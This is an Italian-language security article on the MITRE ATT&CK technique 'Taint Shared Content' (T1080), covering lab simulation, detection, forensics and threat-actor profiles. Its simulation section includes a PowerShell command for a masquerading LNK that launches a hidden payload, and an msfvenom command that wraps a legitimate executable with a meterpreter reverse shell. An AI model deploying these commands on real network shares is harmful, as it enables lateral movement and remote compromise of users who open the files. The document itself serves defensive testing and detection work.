Contenuti Avvelenati nelle Share di Rete: Taint Shared Content (T1080)

La simulazione di questa tecnica in laboratorio richiede un ambiente con almeno due endpoint connessi a una share SMB o NFS. L'obiettivo è verificare se i controlli di detection e prevenzione della rete target rilevano la modifica di contenuti condivisi e l'esecuzione risultante.

Scenario 1 — Directory share pivot con file LNK malevolo. Il concetto è creare un collegamento .LNK che sembra una cartella legittima, esegue un payload nascosto e poi apre la directory reale. Su Windows, puoi generare il file LNK tramite PowerShell:

$ws = New-Object -ComObject WScript.Shell; $lnk = $ws.CreateShortcut("\\LAB-SHARE\HR\Documenti.lnk"); $lnk.TargetPath = "cmd.exe"; $lnk.Arguments = "/c start hidden_payload.exe & explorer \\LAB-SHARE\HR\Documenti_reali"; $lnk.IconLocation = "shell32.dll,3"; $lnk.Save()

Per nascondere il payload e la cartella reale, imposta gli attributi hidden:

attrib +h +s "\\LAB-SHARE\HR\hidden_payload.exe" attrib +h +s "\\LAB-SHARE\HR\Documenti_reali"

Scenario 2 — Iniezione di macro in documenti Office su share. Questo replica il comportamento di Gamaredon Group. Usa un tool come Macro_Pack (open source) per iniettare macro VBA in un documento Word posizionato sulla share. Il framework genera payload in formati Office con offuscamento automatico, semplificando la fase di weaponization in lab.

Scenario 3 — Propagazione tramite binary infection. Per simulare il prepending di codice a un binario legittimo (come fa Ramsay o H1N1), puoi usare msfvenom di Metasploit Framework (open source) per generare un binario che wrappa un eseguibile legittimo:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_LAB> LPORT=4444 -x legit_app.exe -k -f exe -o infected_app.exe

Posiziona il file risultante sulla share al posto dell'originale e monitora se l'EDR interviene.

Scenario 4 — Copia automatica su NAS. Replica il comportamento di Miner-C copiando un eseguibile nella cartella pubblica di un dispositivo NAS di test. Un semplice copy payload.exe \\NAS-LAB\public\ è sufficiente per verificare se il File Integrity Monitoring rileva la modifica.

Per l'orchestrazione completa, Atomic Red Team (open source) fornisce test atomici per T1080 che automatizzano il posizionamento di file su share e la verifica della detection.

Il cuore della detection per questa tecnica è il monitoraggio delle scritture anomale su percorsi di rete condivisi, correlato con l'esecuzione di processi originati da quegli stessi percorsi. L'evento singolo — un file scritto su una share — è banale e ad altissimo volume. Diventa significativo solo quando si concatena con un'azione successiva: apertura, esecuzione o caricamento di quel file da parte di un altro utente.

Su Windows, la coppia di log fondamentale è Sysmon e Security. Sysmon EventCode 11 (FileCreate) cattura la creazione di file su percorsi UNC, mentre EventCode 1 (ProcessCreate) rileva l'esecuzione successiva. La correlazione vincente è: FileCreate su \\server\share\* con estensione sospetta (.lnk, .exe, .vbs, .bat, .scr) seguito, entro una finestra temporale definita, da ProcessCreate il cui campo Image o CommandLine punta allo stesso path. I parametri di tuning critici sono il SharedPathPrefix — che delimita le share monitorate evitando il rumore delle directory temp — e la lista ExecutableExtensions calibrata sull'ambiente.

Per ridurre i falsi positivi, escludi gli account di servizio noti che legittimamente aggiornano software sulle share (es. SCCM, tool di distribuzione pacchetti) e imposta una baseline delle estensioni normalmente presenti in ogni share. Un file .lnk nella cartella HR potrebbe essere normale; dieci .lnk creati in sequenza rapida da un singolo account non lo sono.

Su Linux, il monitoraggio si basa su auditd con regole sui syscall openat e write per i mount point SMB/NFS. Una regola auditd efficace:

-w /mnt/shared -p wa -k tainted_share

Questo genera log per ogni scrittura o modifica di attributi nella directory condivisa. Correla questi eventi con l'esecuzione di processi dal medesimo path tramite SYSCALL execve dove il campo exe contiene il percorso montato.

Su macOS, fsevents intercetta le modifiche alle cartelle condivise. L'indicatore chiave è la presenza di doppie estensioni (es. report.docx.app) o bundle .app in cartelle che normalmente contengono solo documenti.

Per gli ambienti SaaS e cloud, i log di audit di Google Workspace e Microsoft 365 Unified Audit Log espongono upload di file con hash noti come malevoli o pattern di upload anomali — molti file caricati in rapida successione su drive condivisi. Il parametro UserUploadRateThreshold va calibrato per reparto: il team marketing carica molti file, l'account di un singolo analista che popola dieci share in un'ora è un'anomalia.

Un ultimo controllo preventivo: deploy di AppLocker o WDAC per bloccare l'esecuzione di binari da percorsi UNC non autorizzati. Questo taglia la kill chain alla radice, impedendo che il contenuto avvelenato venga mai eseguito.

L'analisi forense di un incidente T1080 ruota attorno a tre domande: chi ha scritto il file malevolo sulla share, quando, e quali endpoint lo hanno successivamente eseguito. La timeline si costruisce incrociando artefatti lato server (la share) e lato client (gli endpoint vittime).

Lato server — Il punto d'origine. Sul file server Windows, il log Security EventCode 5145 (Detailed File Share) registra ogni accesso a oggetti condivisi, incluso il nome del file, l'account e l'IP sorgente. Filtra per AccessMask che includa permessi di scrittura (0x2 o 0x6). Se Sysmon è installato sul file server, EventCode 11 fornisce il timestamp esatto di creazione del file malevolo con il processo responsabile. Su file server Linux con Samba, i log di audit di Samba (full_audit VFS module) tracciano operazioni open, write e rename con username e IP.

L'analisi del filesystem sulla share è cruciale. Usa Autopsy (open source) o FTK Imager (gratuito) per acquisire un'immagine della partizione condivisa. Cerca file con timestamp di creazione ($SI_CREATED in MFT) anomali rispetto al contenuto circostante — un .lnk creato alle 3 di notte in una cartella HR aggiornata solo in orario lavorativo è un indicatore forte.

Per i file .LNK sospetti, LECmd di Eric Zimmerman (open source) parsifica la struttura interna del collegamento, rivelando il target reale, gli argomenti della command line e l'icona utilizzata per il masquerading. Questo è particolarmente rilevante per ricostruire la variante directory share pivot usata da RedCurl.

Lato client — Le vittime della propagazione. Su ogni endpoint che ha aperto il contenuto avvelenato, il focus è su: Prefetch (C:\Windows\Prefetch\) per confermare l'esecuzione del payload con timestamp; NTUSER.DAT per le chiavi RecentDocs e UserAssist che provano l'interazione dell'utente con il file sulla share; Amcache per la prima esecuzione di binari sconosciuti con hash e path originale.

Su Linux, controlla /var/log/audit/audit.log per syscall execve con path che puntano a mount NFS/SMB, e i file .bash_history per eventuali esecuzioni manuali.

La binary infection — prepending o appending di codice malevolo — richiede un'analisi specifica. Confronta l'hash del file infetto con quello del binario legittimo originale. Usa pe-bear (open source) per ispezionare l'Entry Point del PE: se l'OEP è stato modificato per puntare a una sezione aggiunta (tipicamente con nomi casuali o permessi RWX), hai conferma dell'infezione. Stuxnet e Ramsay utilizzavano esattamente questa strategia per propagarsi attraverso le share.

Il panorama degli attori che sfruttano T1080 copre un arco geografico e motivazionale ampio, dal cyber-espionage allo spionaggio industriale fino al ransomware. Cinque gruppi documentati offrono pattern analitici distinti.

Darkhotel ha impiegato un virus che infetta eseguibili sui drive condivisi, una tecnica classica di binary infection. Questo approccio — modificare binari legittimi per iniettare codice malevolo — presuppone capacità di sviluppo malware sofisticate e punta a una propagazione silenziosa e persistente, coerente con operazioni di spionaggio a lungo termine contro target di alto profilo nel settore hospitality e business travel.

RedCurl ha scelto una strada diversa: file .LNK modificati posizionati su drive di rete. La variante directory share pivot è più mirata e sfrutta l'interazione utente piuttosto che l'infezione automatica dei binari. Questo profilo operativo è coerente con attacchi di corporate espionage dove l'accesso iniziale è già stato ottenuto e il movimento laterale deve essere discreto.

Gamaredon Group ha adottato l'approccio più aggressivo: iniezione di macro malevole in tutti i documenti Word ed Excel su drive mappati. La scala dell'operazione — ogni documento diventa un vettore — suggerisce una priorità sul volume di compromissione piuttosto che sulla stealth, tipica delle operazioni attribuite a questo attore contro target ucraini.

BRONZE BUTLER ha sfruttato la tecnica in modo più chirurgico, posizionando malware su file share con nomi identici a documenti legittimi. Questa strategia di masquerading richiede ricognizione preliminare sulla naming convention interna del target, indicando operazioni pianificate contro specifiche organizzazioni.

Cinnamon Tempest rappresenta il versante ransomware: deploy di ransomware tramite batch file su network share. Qui la share non è un vettore di propagazione silenziosa ma un meccanismo di distribuzione rapida per massimizzare l'impatto della cifratura.

Sul fronte software, la convergenza è notevole. Conti, H1N1, Ramsay, Ursnif e Stuxnet implementano tutti la copia o l'infezione di file su share di rete, con varianti che vanno dalla semplice copia (Miner-C su NAS) all'infezione sofisticata di PE (Ramsay, Stuxnet). InvisiMole aggiunge un ulteriore livello sostituendo software legittimo con versioni trojanizzate, una tecnica che rende la detection particolarmente difficile senza File Integrity Monitoring.

Il trend che emerge è chiaro: la share di rete resta un moltiplicatore di forza irresistibile per attori di qualsiasi sofisticazione. Per il TI analyst, la priorità è mappare le share critiche dell'organizzazione e verificare che ogni tool di propagazione noto — da Conti a Ramsay — sia coperto dalle signature EDR in uso.

Framework MITRE ATT&CK: tecnica T1080 (Taint Shared Content), tattica TA0008 (Lateral Movement). Gruppi: G0012, G1039, G0047, G0060, G1021. Software: S0132, S0458, S0260, S0575, S0133, S0603, S0386. Mitigazioni: M1049, M1038, M1022, M1050. Detection: DET0471 (AN1298–AN1302). Integrato con conoscenza professionale per tool e procedure operative.